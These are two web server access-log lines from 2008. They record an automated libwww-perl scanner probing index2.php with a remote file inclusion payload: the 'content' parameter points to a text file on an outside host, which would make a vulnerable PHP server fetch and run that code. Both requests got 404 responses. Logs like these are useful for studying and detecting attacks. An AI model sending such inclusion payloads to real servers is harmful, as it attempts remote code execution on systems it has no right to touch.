151.1.210.219 - - [12/Aug/2008:11:31:20 -0700] "GET /logs//index2.php?content=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:31:21 -0700] "GET //index2.php?content=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
